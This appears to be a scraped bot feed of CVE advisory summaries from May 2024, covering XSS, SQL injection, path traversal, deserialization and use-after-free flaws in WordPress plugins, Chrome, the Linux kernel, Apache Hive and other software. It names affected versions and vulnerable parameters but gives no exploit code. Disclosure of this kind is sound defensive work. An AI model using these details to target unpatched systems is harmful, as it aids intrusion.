🚨 CVE-2024-34460The Tree Explorer tool from Organizer in Zenario before 9.5.60602 is affected by XSS. (This component was removed in 9.5.60602.)🎖@cveNotify |
|
| 2024-05-04 04:37:25 |
🚨 CVE-2024-3240The ConvertPlug plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.25 via deserialization of untrusted input from the 'settings_encoded' attribute of the 'smile_info_bar' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-05-04 04:37:24 |
🚨 CVE-2024-3237The ConvertPlug plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cp_dismiss_notice() function in all versions up to, and including, 3.5.25. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary option values to true.🎖@cveNotify |
|
| 2024-05-04 03:37:26 |
🚨 CVE-2024-24795HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack.Users are recommended to upgrade to version 2.4.59, which fixes this issue.🎖@cveNotify |
|
| 2024-05-04 03:37:25 |
🚨 CVE-2023-36617A ReDoS issue was discovered in the URI component before 0.12.2 for Ruby. The URI parser mishandles invalid URLs that have specific characters. There is an increase in execution time for parsing strings to URI objects with rfc2396_parser.rb and rfc3986_parser.rb. NOTE: this issue exists becuse of an incomplete fix for CVE-2023-28755. Version 0.10.3 is also a fixed version.🎖@cveNotify |
|
| 2024-05-04 03:37:24 |
🚨 CVE-2023-28755A ReDoS issue was discovered in the URI component through 0.12.0 in Ruby through 3.2.1. The URI parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to URI objects. The fixed versions are 0.12.1, 0.11.1, 0.10.2 and 0.10.0.1.🎖@cveNotify |
|
| 2024-05-04 02:37:26 |
🚨 CVE-2024-4368Use after free in Dawn in Google Chrome prior to 124.0.6367.118 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-04 02:37:25 |
🚨 CVE-2023-36617A ReDoS issue was discovered in the URI component before 0.12.2 for Ruby. The URI parser mishandles invalid URLs that have specific characters. There is an increase in execution time for parsing strings to URI objects with rfc2396_parser.rb and rfc3986_parser.rb. NOTE: this issue exists becuse of an incomplete fix for CVE-2023-28755. Version 0.10.3 is also a fixed version.🎖@cveNotify |
|
| 2024-05-04 02:37:24 |
🚨 CVE-2023-28755A ReDoS issue was discovered in the URI component through 0.12.0 in Ruby through 3.2.1. The URI parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to URI objects. The fixed versions are 0.12.1, 0.11.1, 0.10.2 and 0.10.0.1.🎖@cveNotify |
|
| 2024-05-04 01:37:24 |
🚨 CVE-2024-2961The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.🎖@cveNotify |
|
| 2024-05-03 21:37:27 |
🚨 CVE-2022-32317The MPlayer Project v1.5 was discovered to contain a heap use-after-free resulting in a double free in the preinit function at libvo/vo_v4l2.c. This vulnerability can lead to a Denial of Service (DoS) via a crafted file. The device=strdup statement is not executed on every call. Note: This has been disputed by third parties as invalid and not reproduceable.🎖@cveNotify |
|
| 2024-05-03 21:37:26 |
🚨 CVE-2020-26732SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 does not set the Secure flag for the session cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session.🎖@cveNotify |
|
| 2024-05-03 18:37:28 |
🚨 CVE-2021-20556IBM Cognos Controller 10.4.1, 10.4.2, and 11.0.0 could allow a remote user to enumerate usernames due to differentiating error messages on existing usernames. IBM X-Force ID: 199181.🎖@cveNotify |
|
| 2024-05-03 17:37:38 |
🚨 CVE-2024-33792A cross-site scripting (XSS) vulnerability in netis-systems MEX605 v2.00.06 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tracert page.🎖@cveNotify |
|
| 2024-05-03 17:37:37 |
🚨 CVE-2024-33789Linksys E5600 v1.1.0.26 was discovered to contain a command injection vulnerability via the ipurl parameter at /API/info form endpoint.🎖@cveNotify |
|
| 2024-05-03 17:37:33 |
🚨 CVE-2024-30851Directory Traversal vulnerability in codesiddhant Jasmin Ransomware v.1.0.1 allows an attacker to obtain sensitive information via the download_file.php component.🎖@cveNotify |
|
| 2024-05-03 17:37:32 |
🚨 CVE-2021-20450IBM Cognos Controller 10.4.1, 10.4.2, and 11.0.0 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 196640.🎖@cveNotify |
|
| 2024-05-03 17:37:31 |
🚨 CVE-2020-4874IBM Cognos Controller 10.4.1, 10.4.2, and 11.0.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 190837.🎖@cveNotify |
|
| 2024-05-03 17:37:28 |
🚨 CVE-2024-31967A vulnerability on Mitel 6800 Series and 6900 Series SIP Phones through 6.3 SP3 HF4, 6900w Series SIP Phone through 6.3.3, and 6970 Conference Unit through 5.1.1 SP8 allows an unauthenticated attacker to conduct an unauthorized access attack due to improper access control. A successful exploit could allow an attacker to gain unauthorized access to user information or the system configuration.🎖@cveNotify |
|
| 2024-05-03 17:37:27 |
🚨 CVE-2024-31965A vulnerability on Mitel 6800 Series and 6900 Series SIP Phones through 6.3 SP3 HF4, 6900w Series SIP Phone through 6.3.3, and 6970 Conference Unit through 5.1.1 SP8 allows an authenticated attacker with administrative privilege to conduct a path traversal attack due to insufficient input validation. A successful exploit could allow an attacker to access sensitive information.🎖@cveNotify |
|
| 2024-05-03 17:37:26 |
🚨 CVE-2024-31963A vulnerability on Mitel 6800 Series and 6900 Series SIP Phones through 6.3 SP3 HF4, 6900w Series SIP Phone through 6.3.3, and 6970 Conference Unit through 5.1.1 SP8 allows an authenticated attacker to conduct a buffer overflow attack due to insufficient bounds checking and input sanitization. A successful exploit could allow an attacker to gain access to sensitive information, modify system configuration or execute arbitrary commands within the context of the system.🎖@cveNotify |
|
| 2024-05-03 16:37:44 |
🚨 CVE-2022-48699In the Linux kernel, the following vulnerability has been resolved:sched/debug: fix dentry leak in update_sched_domain_debugfsKuyo reports that the pattern of using debugfs_remove(debugfs_lookup())leaks a dentry and with a hotplug stress test, the machine eventuallyruns out of memory.Fix this up by using the newly created debugfs_lookup_and_remove() callinstead which properly handles the dentry reference counting logic.🎖@cveNotify |
|
| 2024-05-03 16:37:43 |
🚨 CVE-2022-48697In the Linux kernel, the following vulnerability has been resolved:nvmet: fix a use-after-freeFix the following use-after-free complaint triggered by blktests nvme/004:BUG: KASAN: user-memory-access in blk_mq_complete_request_remote+0xac/0x350Read of size 4 at addr 0000607bd1835943 by task kworker/13:1/460Workqueue: nvmet-wq nvme_loop_execute_work [nvme_loop]Call Trace: show_stack+0x52/0x58 dump_stack_lvl+0x49/0x5e print_report.cold+0x36/0x1e2 kasan_report+0xb9/0xf0 __asan_load4+0x6b/0x80 blk_mq_complete_request_remote+0xac/0x350 nvme_loop_queue_response+0x1df/0x275 [nvme_loop] __nvmet_req_complete+0x132/0x4f0 [nvmet] nvmet_req_complete+0x15/0x40 [nvmet] nvmet_execute_io_connect+0x18a/0x1f0 [nvmet] nvme_loop_execute_work+0x20/0x30 [nvme_loop] process_one_work+0x56e/0xa70 worker_thread+0x2d1/0x640 kthread+0x183/0x1c0 ret_from_fork+0x1f/0x30🎖@cveNotify |
|
| 2024-05-03 16:37:42 |
🚨 CVE-2024-29988SmartScreen Prompt Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-05-03 16:37:38 |
🚨 CVE-2023-4958In Red Hat Advanced Cluster Security (RHACS), it was found that some security related HTTP headers were missing, allowing an attacker to exploit this with a clickjacking attack. An attacker could exploit this by convincing a valid RHACS user to visit an attacker-controlled web page, that deceptively points to valid RHACS endpoints, hijacking the user's account permissions to perform other actions.🎖@cveNotify |
|
| 2024-05-03 16:37:37 |
🚨 CVE-2023-3223A flaw was found in undertow. Servlets annotated with @MultipartConfig may cause an OutOfMemoryError due to large multipart content. This may allow unauthorized users to cause remote Denial of Service (DoS) attack. If the server uses fileSizeThreshold to limit the file size, it's possible to bypass the limit by setting the file name in the request to null.🎖@cveNotify |
|
| 2024-05-03 16:37:36 |
🚨 CVE-2022-4318A vulnerability was found in cri-o. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.🎖@cveNotify |
|
| 2024-05-03 16:37:32 |
🚨 CVE-2022-4244A flaw was found in codeplex-codehaus. A directory traversal attack (also known as path traversal) aims to access files and directories stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and their variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration, and other critical system files.🎖@cveNotify |
|
| 2024-05-03 16:37:31 |
🚨 CVE-2022-3596An information leak was found in OpenStack's undercloud. This flaw allows unauthenticated, remote attackers to inspect sensitive data after discovering the IP address of the undercloud, possibly leading to compromising private information, including administrator access credentials.🎖@cveNotify |
|
| 2024-05-03 16:37:30 |
🚨 CVE-2023-0118An arbitrary code execution flaw was found in Foreman. This flaw allows an admin user to bypass safe mode in templates and execute arbitrary code on the underlying operating system.🎖@cveNotify |
|
| 2024-05-03 16:37:26 |
🚨 CVE-2023-0813A flaw was found in the Network Observability plugin for OpenShift console. Unless the Loki authToken configuration is set to FORWARD mode, authentication is no longer enforced, allowing any user who can connect to the OpenShift Console in an OpenShift cluster to retrieve flows without authentication.🎖@cveNotify |
|
| 2024-05-03 16:37:25 |
🚨 CVE-2023-0119A stored Cross-site scripting vulnerability was found in foreman. The Comment section in the Hosts tab has incorrect filtering of user input data. As a result of the attack, an attacker with an existing account on the system can steal another user's session, make requests on behalf of the user, and obtain user credentials.🎖@cveNotify |
|
| 2024-05-03 16:37:24 |
🚨 CVE-2022-1415A flaw was found where some utility classes in Drools core did not use proper safeguards when deserializing data. This flaw allows an authenticated attacker to construct malicious serialized objects (usually called gadgets) and achieve code execution on the server.🎖@cveNotify |
|
| 2024-05-03 15:37:24 |
🚨 CVE-2022-48670In the Linux kernel, the following vulnerability has been resolved:peci: cpu: Fix use-after-free in adev_release()When auxiliary_device_add() returns an error, auxiliary_device_uninit()is called, which causes refcount for device to be decremented and.release callback will be triggered.Because adev_release() re-calls auxiliary_device_uninit(), it will causeuse-after-free:[ 1269.455172] WARNING: CPU: 0 PID: 14267 at lib/refcount.c:28 refcount_warn_saturate+0x110/0x15[ 1269.464007] refcount_t: underflow; use-after-free.🎖@cveNotify |
|
| 2024-05-03 14:37:46 |
🚨 CVE-2024-1395Use After Free vulnerability in Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations. If the system’s memory is carefully prepared by the user, then this in turn could give them access to already freed memory.This issue affects Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r47p0.🎖@cveNotify |
|
| 2024-05-03 14:37:45 |
🚨 CVE-2023-6363Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations. If the system’s memory is carefully prepared by the user, then this in turn could give them access to already freed memory.This issue affects Valhall GPU Kernel Driver: from r41p0 through r47p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r47p0.🎖@cveNotify |
|
| 2024-05-03 14:37:44 |
🚨 CVE-2023-41830An improper absolute path traversal vulnerability was reported for the Ready For application allowing a local application access to files without authorization.🎖@cveNotify |
|
| 2024-05-03 14:37:41 |
🚨 CVE-2023-41828An implicit intent export vulnerability was reported in the Motorola Phone application, that could allow unauthorized access to a non-exported content provider.🎖@cveNotify |
|
| 2024-05-03 14:37:40 |
🚨 CVE-2023-41825A path traversal vulnerability was reported in the Motorola Ready For application that could allow a local attacker to access local files.🎖@cveNotify |
|
| 2024-05-03 14:37:39 |
🚨 CVE-2023-41823An improper export vulnerability was reported in the Motorola Phone Extension application, that could allow a local attacker to execute unauthorized Activities.🎖@cveNotify |
|
| 2024-05-03 14:37:35 |
🚨 CVE-2023-41822An improper export vulnerability was reported in the Motorola Interface Test Tool application that could allow a malicious local application to execute OS commands.🎖@cveNotify |
|
| 2024-05-03 14:37:34 |
🚨 CVE-2023-41820An implicit intent vulnerability was reported in the Motorola Ready For application that could allow a local attacker to read information about connected Bluetooth audio devices.🎖@cveNotify |
|
| 2024-05-03 14:37:33 |
🚨 CVE-2023-41818An improper use of the SD card for sensitive data vulnerability was reported in the Motorola Device Help application that could allow a local attacker to read system logs.🎖@cveNotify |
|
| 2024-05-03 14:37:29 |
🚨 CVE-2023-41816An improper export vulnerability was reported in the Motorola Services Main application that could allow a local attacker to write to a local database.🎖@cveNotify |
|
| 2024-05-03 14:37:28 |
🚨 CVE-2024-33787Hengan Weighing Management Information Query Platform 2019-2021 53.25 was discovered to contain a SQL injection vulnerability via the tuser_Number parameter at search_user.aspx.🎖@cveNotify |
|
| 2024-05-03 14:37:27 |
🚨 CVE-2024-2410The JsonToBinaryStream() function is part of the protocol buffers C++ implementation and is used to parse JSON from a stream. If the input is broken up into separate chunks in a certain way, the parser will attempt to read bytes from a chunk that has already been freed.🎖@cveNotify |
|
| 2024-05-03 13:37:25 |
🚨 CVE-2023-6129Issue summary: The POLY1305 MAC (message authentication code) implementationcontains a bug that might corrupt the internal state of applications runningon PowerPC CPU based platforms if the CPU provides vector instructions.Impact summary: If an attacker can influence whether the POLY1305 MACalgorithm is used, the application state might be corrupted with variousapplication dependent consequences.The POLY1305 MAC (message authentication code) implementation in OpenSSL forPowerPC CPUs restores the contents of vector registers in a different orderthan they are saved. Thus the contents of some of these vector registersare corrupted when returning to the caller. The vulnerable code is used onlyon newer PowerPC processors supporting the PowerISA 2.07 instructions.The consequences of this kind of internal application state corruption canbe various - from no consequences, if the calling application does notdepend on the contents of non-volatile XMM registers at all, to the worstconsequences, where the attacker could get complete control of the applicationprocess. However unless the compiler uses the vector registers for storingpointers, the most likely consequence, if any, would be an incorrect resultof some application dependent calculations or a crash leading to a denial ofservice.The POLY1305 MAC algorithm is most frequently used as part of theCHACHA20-POLY1305 AEAD (authenticated encryption with associated data)algorithm. The most common usage of this AEAD cipher is with TLS protocolversions 1.2 and 1.3. If this cipher is enabled on the server a maliciousclient can influence whether this AEAD cipher is used. This implies thatTLS server applications using OpenSSL can be potentially impacted. Howeverwe are currently not aware of any concrete application that would be affectedby this issue therefore we consider this a Low severity security issue.🎖@cveNotify |
|
| 2024-05-03 13:37:24 |
🚨 CVE-2023-3010Grafana is an open-source platform for monitoring and observability. The WorldMap panel plugin, versions before 1.0.4 contains a DOM XSS vulnerability.🎖@cveNotify |
|
| 2024-05-03 13:07:27 |
🚨 CVE-2024-33394An issue in kubevirt kubevirt v1.2.0 and before allows a local attacker to execute arbitrary code via a crafted command to get the token component.🎖@cveNotify |
|
| 2024-05-03 12:37:25 |
🚨 CVE-2024-4466SQL injection vulnerability in Gescen on the centrosdigitales.net platform. This vulnerability allows an attacker to send a specially crafted SQL query to the pass parameter and retrieve all the data stored in the database.🎖@cveNotify |
|
| 2024-05-03 12:37:24 |
🚨 CVE-2023-35701Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Hive.The vulnerability affects the Hive JDBC driver component and it can potentially lead to arbitrary code execution on the machine/endpoint that the JDBC driver (client) is running. The malicious user must have sufficient permissions to specify/edit JDBC URL(s) in an endpoint relying on the Hive JDBC driver and the JDBC client process must run under a privileged user to fully exploit the vulnerability. The attacker can setup a malicious HTTP server and specify a JDBC URL pointing towards this server. When a JDBC connection is attempted, the malicious HTTP server can provide a special response with customized payload that can trigger the execution of certain commands in the JDBC client.This issue affects Apache Hive: from 4.0.0-alpha-1 before 4.0.0.Users are recommended to upgrade to version 4.0.0, which fixes the issue.🎖@cveNotify |
|
| 2024-05-03 11:37:25 |
🚨 CVE-2024-34073sagemaker-python-sdk is a library for training and deploying machine learning models on Amazon SageMaker. In affected versions the capture_dependencies function in `sagemaker.serve.save_retrive.version_1_0_0.save.utils` module allows for potentially unsafe Operating System (OS) Command Injection if inappropriate command is passed as the “requirements_path” parameter. This consequently may allow an unprivileged third party to cause remote code execution, denial of service, affecting both confidentiality and integrity. This issue has been addressed in version 2.214.3. Users are advised to upgrade. Users unable to upgrade should not override the “requirements_path” parameter of capture_dependencies function in `sagemaker.serve.save_retrive.version_1_0_0.save.utils`, and instead use the default value.🎖@cveNotify |
|
| 2024-05-03 11:37:24 |
🚨 CVE-2024-34072sagemaker-python-sdk is a library for training and deploying machine learning models on Amazon SageMaker. The sagemaker.base_deserializers.NumpyDeserializer module before v2.218.0 allows potentially unsafe deserialization when untrusted data is passed as pickled object arrays. This consequently may allow an unprivileged third party to cause remote code execution, denial of service, affecting both confidentiality and integrity. Users are advised to upgrade to version 2.218.0. Users unable to upgrade should not pass pickled numpy object arrays which originated from an untrusted source, or that could have been tampered with. Only pass pickled numpy object arrays from trusted sources.🎖@cveNotify |
|
| 2024-05-03 10:37:25 |
🚨 CVE-2024-34062tqdm is an open source progress bar for Python and CLI. Any optional non-boolean CLI arguments (e.g. `--delim`, `--buf-size`, `--manpath`) are passed through python's `eval`, allowing arbitrary code execution. This issue is only locally exploitable and had been addressed in release version 4.66.3. All users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-05-03 10:37:24 |
🚨 CVE-2024-32986PWAsForFirefox is a tool to install, manage and use Progressive Web Apps (PWAs) in Mozilla Firefox. Due to improper sanitization of web app properties (such as name, description, shortcuts), web apps were able to inject additional lines into XDG Desktop Entries (on Linux) and `AppInfo.ini` (on PortableApps.com). This allowed malicious web apps to introduce keys like `Exec`, which could run arbitrary code when the affected web app was launched. This vulnerability affects all Linux and PortableApps.com users of all PWAsForFirefox versions up to (excluding) 2.12.0. Windows and macOS users are not affected. This vulnerability has been fixed in commit `9932d4b` which has been included in release in v2.12.0. The main fix is implemented in the native part, but the extension also contains additional fixes. All Linux and PortableApps.com users are advised to update to this version as soon as possible. It is also recommended for Windows and macOS users to update to this version, as it contains additional fixes related to properties sanitization. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-05-03 09:37:38 |
🚨 CVE-2024-33931Missing Authorization vulnerability in ilGhera JW Player for WordPress.This issue affects JW Player for WordPress: from n/a through 2.3.3.🎖@cveNotify |
|
| 2024-05-03 09:37:37 |
🚨 CVE-2024-33925Missing Authorization vulnerability in Adrian Mörchen Embed Google Fonts.This issue affects Embed Google Fonts: from n/a through 3.1.0.🎖@cveNotify |
|
| 2024-05-03 09:37:36 |
🚨 CVE-2024-33923Missing Authorization vulnerability in Smartypants SP Project & Document Manager.This issue affects SP Project & Document Manager : from n/a through 4.69.🎖@cveNotify |
|
| 2024-05-03 09:37:32 |
🚨 CVE-2024-33920Missing Authorization vulnerability in Kama Democracy Poll.This issue affects Democracy Poll: from n/a through 6.0.3.🎖@cveNotify |
|
| 2024-05-03 09:37:31 |
🚨 CVE-2024-33915Missing Authorization vulnerability in Bowo Debug Log Manager.This issue affects Debug Log Manager: from n/a through 2.3.1.🎖@cveNotify |
|
| 2024-05-03 09:37:30 |
🚨 CVE-2024-33914Missing Authorization vulnerability in Exclusive Addons Exclusive Addons Elementor.This issue affects Exclusive Addons Elementor: from n/a through 2.6.9.1.🎖@cveNotify |
|
| 2024-05-03 09:37:26 |
🚨 CVE-2024-23913Use of Out-of-range Pointer Offset vulnerability in Merge DICOM Toolkit C/C++ on Windows.When deprecated MC_XML_To_Message() function is used to read a malformed DICOM XML file, it might result in memory access violation.🎖@cveNotify |
|
| 2024-05-03 09:37:25 |
🚨 CVE-2023-35701Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Hive.The vulnerability affects the Hive JDBC driver component and it can potentially lead to arbitrary code execution on the machine/endpoint that the JDBC driver (client) is running. The malicious user must have sufficient permissions to specify/edit JDBC URL(s) in an endpoint relying on the Hive JDBC driver and the JDBC client process must run under a privileged user to fully exploit the vulnerability. The attacker can setup a malicious HTTP server and specify a JDBC URL pointing towards this server. When a JDBC connection is attempted, the malicious HTTP server can provide a special response with customized payload that can trigger the execution of certain commands in the JDBC client.This issue affects Apache Hive: from 4.0.0-alpha-1 before 4.0.0.Users are recommended to upgrade to version 4.0.0, which fixes the issue.🎖@cveNotify |
|
| 2024-05-03 09:37:24 |
🚨 CVE-2023-31211Insufficient authentication flow in Checkmk before 2.2.0p18, 2.1.0p38 and 2.0.0p39 allows attacker to use locked credentials🎖@cveNotify |
|
| 2024-05-03 08:37:37 |
🚨 CVE-2024-33927Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Team GIPHY Giphypress allows Stored XSS.This issue affects Giphypress: from n/a through 1.6.2.🎖@cveNotify |
|
| 2024-05-03 08:37:33 |
🚨 CVE-2024-33926Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Karl Kiesinger GWP-Histats allows Stored XSS.This issue affects GWP-Histats: from n/a through 1.0.🎖@cveNotify |
|
| 2024-05-03 08:37:32 |
🚨 CVE-2024-33918Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Maxim K AJAX Login and Registration modal popup + inline form allows Stored XSS.This issue affects AJAX Login and Registration modal popup + inline form: from n/a through 2.23.🎖@cveNotify |
|
| 2024-05-03 08:37:31 |
🚨 CVE-2024-33916Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MachoThemes CPO Companion allows Stored XSS.This issue affects CPO Companion: from n/a through 1.1.0.🎖@cveNotify |
|
| 2024-05-03 08:37:30 |
🚨 CVE-2024-32831Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lorna Timbah (webgrrrl) Accessibility Widget allows Stored XSS.This issue affects Accessibility Widget: from n/a through 2.2.🎖@cveNotify |
|
| 2024-05-03 08:37:26 |
🚨 CVE-2024-28072A highly privileged account can overwrite arbitrary files on the system with log output. The log file path tags were not sanitized properly.🎖@cveNotify |
|
| 2024-05-03 08:37:25 |
🚨 CVE-2023-44472Missing Authorization vulnerability in ThemeFuse Unyson.This issue affects Unyson: from n/a through 2.7.28.🎖@cveNotify |
|
| 2024-05-03 08:37:24 |
🚨 CVE-2023-25457Missing Authorization vulnerability in Richteam Slider Carousel – Responsive Image Slider.This issue affects Slider Carousel – Responsive Image Slider: from n/a through 1.5.1.🎖@cveNotify |
|
| 2024-05-03 07:37:33 |
🚨 CVE-2024-33947Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Metagauss RegistrationMagic allows Reflected XSS.This issue affects RegistrationMagic: from n/a through 5.3.2.0.🎖@cveNotify |
|
| 2024-05-03 07:37:32 |
🚨 CVE-2024-33945Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in solverwp.Com Eleblog – Elementor Blog And Magazine Addons allows Stored XSS.This issue affects Eleblog – Elementor Blog And Magazine Addons: from n/a through 1.8.🎖@cveNotify |
|
| 2024-05-03 07:37:31 |
🚨 CVE-2024-33940Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashan Jay EventON allows Stored XSS.This issue affects EventON: from n/a through 2.2.14.🎖@cveNotify |
|
| 2024-05-03 07:37:26 |
🚨 CVE-2024-33935Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pascal Bajorat PB MailCrypt allows Stored XSS.This issue affects PB MailCrypt: from n/a through 3.1.0.🎖@cveNotify |
|
| 2024-05-03 07:37:25 |
🚨 CVE-2024-33932Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vinod Dalvi Login Logout Register Menu allows Stored XSS.This issue affects Login Logout Register Menu: from n/a through 2.0.🎖@cveNotify |
|
| 2024-05-03 07:37:24 |
🚨 CVE-2024-33928Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeBard CodeBard's Patron Button and Widgets for Patreon allows Reflected XSS.This issue affects CodeBard's Patron Button and Widgets for Patreon: from n/a through 2.2.0.🎖@cveNotify |
|
| 2024-05-03 06:37:28 |
🚨 CVE-2024-26923In the Linux kernel, the following vulnerability has been resolved:af_unix: Fix garbage collector racing against connect()Garbage collector does not take into account the risk of embryo gettingenqueued during the garbage collection. If such embryo has a peer thatcarries SCM_RIGHTS, two consecutive passes of scan_children() may see adifferent set of children. Leading to an incorrectly elevated inflightcount, and then a dangling pointer within the gc_inflight_list.sockets are AF_UNIX/SOCK_STREAMS is an unconnected socketL is a listening in-flight socket bound to addr, not in fdtableV's fd will be passed via sendmsg(), gets inflight count bumpedconnect(S, addr) sendmsg(S, [V]); close(V) __unix_gc()---------------- ------------------------- -----------NS = unix_create1()skb1 = sock_wmalloc(NS)L = unix_find_other(addr)unix_state_lock(L)unix_peer(S) = NS // V count=1 inflight=0 NS = unix_peer(S) skb2 = sock_alloc() skb_queue_tail(NS, skb2[V]) // V became in-flight // V count=2 inflight=1 close(V) // V count=1 inflight=1 // GC candidate condition met for u in gc_inflight_list: if (total_refs == inflight_refs) add u to gc_candidates // gc_candidates={L, V} for u in gc_candidates: scan_children(u, dec_inflight) // embryo (skb1) was not // reachable from L yet, so V's // inflight remains unchanged__skb_queue_tail(L, skb1)unix_state_unlock(L) for u in gc_candidates: if (u.inflight) scan_children(u, inc_inflight_move_tail) // V count=1 inflight=2 (!)If there is a GC-candidate listening socket, lock/unlock its state. Thismakes GC wait until the end of any ongoing connect() to that socket. Afterflipping the lock, a possibly SCM-laden embryo is already enqueued. And ifthere is another embryo coming, it can not possibly carry SCM_RIGHTS. Atthis point, unix_inflight() can not happen because unix_gc_lock is alreadytaken. Inflight graph remains unaffected.🎖@cveNotify |
|
| 2024-05-03 06:37:27 |
🚨 CVE-2024-26920In the Linux kernel, the following vulnerability has been resolved:tracing/trigger: Fix to return error if failed to alloc snapshotFix register_snapshot_trigger() to return error code if it failed toallocate a snapshot instead of 0 (success). Unless that, it will registersnapshot trigger without an error.🎖@cveNotify |
|
| 2024-05-03 06:37:26 |
🚨 CVE-2023-52614In the Linux kernel, the following vulnerability has been resolved:PM / devfreq: Fix buffer overflow in trans_stat_showFix buffer overflow in trans_stat_show().Convert simple snprintf to the more secure scnprintf with size ofPAGE_SIZE.Add condition checking if we are exceeding PAGE_SIZE and exit early fromloop. Also add at the end a warning that we exceeded PAGE_SIZE and thatstats is disabled.Return -EFBIG in the case where we don't have enough space to write thefull transition table.Also document in the ABI that this function can return -EFBIG error.🎖@cveNotify |
|
| 2024-05-03 04:37:29 |
🚨 CVE-2024-4060Use after free in Dawn in Google Chrome prior to 124.0.6367.78 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-03 04:37:28 |
🚨 CVE-2024-3839Out of bounds read in Fonts in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-05-03 04:37:27 |
🚨 CVE-2023-29483eventlet before 0.35.2, as used in dnspython before 2.6.0, allows remote attackers to interfere with DNS name resolution by quickly sending an invalid packet from the expected IP address and source port, aka a "TuDoor" attack. In other words, dnspython does not have the preferred behavior in which the DNS name resolution algorithm would proceed, within the full time window, in order to wait for a valid packet. NOTE: dnspython 2.6.0 is unusable for a different reason that was addressed in 2.6.1.🎖@cveNotify |
|
| 2024-05-03 03:37:42 |
🚨 CVE-2024-31208Synapse is an open-source Matrix homeserver. A remote Matrix user with malicious intent, sharing a room with Synapse instances before 1.105.1, can dispatch specially crafted events to exploit a weakness in the V2 state resolution algorithm. This can induce high CPU consumption and accumulate excessive data in the database of such instances, resulting in a denial of service. Servers in private federations, or those that do not federate, are not affected. Server administrators should upgrade to 1.105.1 or later. Some workarounds are available. One can ban the malicious users or ACL block servers from the rooms and/or leave the room and purge the room using the admin API.🎖@cveNotify |
|
| 2024-05-03 03:37:41 |
🚨 CVE-2024-26922In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu: validate the parameters of bo mapping operations more clearlyVerify the parameters ofamdgpu_vm_bo_(map/replace_map/clearing_mappings) in one common place.🎖@cveNotify |
|
| 2024-05-03 03:37:37 |
🚨 CVE-2024-3847Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-05-03 03:37:36 |
🚨 CVE-2024-3845Inappropriate implementation in Networks in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass mixed content policy via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-05-03 03:37:32 |
🚨 CVE-2024-3843Insufficient data validation in Downloads in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-05-03 03:37:31 |
🚨 CVE-2024-3837Use after free in QUIC in Google Chrome prior to 124.0.6367.60 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-05-03 03:37:30 |
🚨 CVE-2024-3833Object corruption in WebAssembly in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-03 03:37:27 |
